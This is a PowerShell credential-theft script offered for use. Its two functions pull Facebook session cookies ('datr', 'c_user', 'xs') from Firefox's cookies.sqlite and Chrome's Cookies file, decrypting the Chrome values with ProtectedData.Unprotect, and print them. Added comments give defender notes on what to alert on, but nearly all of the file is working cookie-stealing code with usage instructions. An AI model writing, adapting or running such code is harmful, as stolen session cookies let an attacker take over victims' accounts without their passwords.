- # Instructions: import the module, then run the command needed.
- # Chrome Facebook cookies extraction
- # Use: Get-FacebookCreds [path to Login Data]
- # Path is optional, use if automatic search doesn't work
- # Get-FacebookCreds-Firefox: reads a Firefox cookies.sqlite file as raw bytes and prints the
- # text that follows the facebook.com cookie names "datr", "c_user" and "xs".
- # Parameter -Path: optional path to the cookie database. When empty, the function looks under
- #   %USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite.
- # Output: three strings written to the pipeline ("datr is ...", "c_user is ...", "xs is ...").
- # Defender note: the function never decrypts anything, so whatever it prints is stored readably
- #   in the file. A non-browser process (for example a script host) opening cookies.sqlite is the
- #   observable event to alert on; if these values are suspected to be exposed, ending all active
- #   sessions for the account is the remedy, presumably because they identify a logged-in session
- #   (confirm against the site's own documentation).
- function Get-FacebookCreds-Firefox() {
- Param(
- [String]$Path
- )
- if ([String]::IsNullOrEmpty($Path)) {
- # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
- # NOTE(review): a wildcard Get-ChildItem can yield zero or several items, so $path is not
- # guaranteed to hold exactly one file path after this line.
- $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
- }
- if (![system.io.file]::Exists($Path))
- {
- Write-Error 'Firefox db file doesnt exist, or invalid file path specified.'
- # NOTE(review): Break is used here outside of any loop.
- Break
- }
- # System.Security is loaded here, but nothing in this function calls into it.
- Add-Type -AssemblyName System.Security
- # Credit to Matt Graber for his technique on using regular expressions to search for binary data
- # Arguments are FileMode 'Open', FileAccess 'Read', FileShare 'ReadWrite': the file is opened
- # read-only while other processes are still allowed to hold it open for reading and writing.
- $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
- # Code page 28591 is ISO-8859-1; it maps every byte to one character, which is what lets the
- # regexes below match raw bytes in the decoded text.
- $Encoding = [system.Text.Encoding]::GetEncoding(28591)
- $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
- # The whole file is read into memory as one string.
- $BinaryText = $StreamReader.ReadToEnd()
- $StreamReader.Close()
- $Stream.Close()
- # First the magic bytes for the facebook string, datr size is 24
- # The escaped bytes spell "facebook.com" immediately followed by "datr"; the group captures
- # the next 24 characters of any kind. Despite the Pwd* variable names, this is a cookie value,
- # not a password.
- $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- $datr = $PwdMatches.groups[1]
- # A bare string expression: the text is emitted to the pipeline.
- "datr is $datr"
- # First the magic bytes for the facebook string, c_user size is 15
- # Same pattern shape: "facebook.com" + "c_user", then a 15-character capture.
- $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- $c_user = $PwdMatches.groups[1]
- "c_user is $c_user"
- # First the magic bytes for the facebook string, xs size is 44
- # Same pattern shape: "facebook.com" + "xs", then a 44-character capture.
- $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- $xs = $PwdMatches.groups[1]
- "xs is $xs"
- }
- # Get-FacebookCreds-Chrome: reads a Chrome Cookies file as raw bytes, locates the protected
- # blobs stored next to the .facebook.com cookie names "datr", "c_user" and "xs", decrypts each
- # with ProtectedData.Unprotect, and prints the results.
- # Parameter -Path: optional path to the cookie database. When empty, it defaults to
- #   %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\Cookies.
- # Output: three strings written to the pipeline ("datr is ...", "c_user is ...", "xs is ...").
- # Defender note: the behaviour visible in this function is a script host opening the browser's
- #   Cookies file and then calling ProtectedData.Unprotect with CurrentUser scope. Both events,
- #   seen together from a non-browser process, are the signal to alert on. The Unprotect call is
- #   made without additional entropy, so any code running as the same user can make the same
- #   call; the protection here rests on what runs under the user account, not on the file alone.
- function Get-FacebookCreds-Chrome() {
- Param(
- [String]$Path
- )
- if ([String]::IsNullOrEmpty($Path)) {
- $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
- }
- if (![system.io.file]::Exists($Path))
- {
- Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
- # NOTE(review): Break is used here outside of any loop.
- Break
- }
- # Loaded for System.Security.Cryptography.ProtectedData, which is used below.
- Add-Type -AssemblyName System.Security
- # Credit to Matt Graber for his technique on using regular expressions to search for binary data
- # Arguments are FileMode 'Open', FileAccess 'Read', FileShare 'ReadWrite': the file is opened
- # read-only while other processes are still allowed to hold it open for reading and writing.
- $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
- # Code page 28591 is ISO-8859-1; it maps every byte to one character, so the decoded string
- # can be searched with byte-level regexes and turned back into the same bytes with GetBytes.
- $Encoding = [system.Text.Encoding]::GetEncoding(28591)
- $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
- # The whole file is read into memory as one string.
- $BinaryText = $StreamReader.ReadToEnd()
- $StreamReader.Close()
- $Stream.Close()
- # First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
- # Pattern: ".facebook.com" + "datr" (group 1) + "/", then a lazy skip to the bytes 01 00 00 00
- # followed by 242 characters (group 2). The fixed length is hard-coded by the author; the code
- # assumes the stored value is a blob of exactly that size.
- $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
- # Despite the Pwd names, $Pwd holds the bytes of a protected cookie value, not a password.
- $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
- # Unprotect arguments: the blob, no optional entropy ($null), CurrentUser scope.
- $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
- # The decrypted bytes are decoded with the system default encoding.
- $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
- # A bare string expression: the text is emitted to the pipeline.
- "datr is $DecPwd"
- # First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
- # Same pattern shape for "c_user", with a 226-character blob body after the 4-byte prefix.
- $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
- $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
- $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
- $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
- "c_user is $DecPwd"
- # First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
- # Same pattern shape for "xs", with a 258-character blob body after the 4-byte prefix.
- $PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
- $PwdMatches = $PwdRegex.Matches($BinaryText)
- # [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
- $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
- $Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
- $DecPwd = [System.Text.Encoding]::Default.GetString($Decrypt)
- "xs is $DecPwd"
- }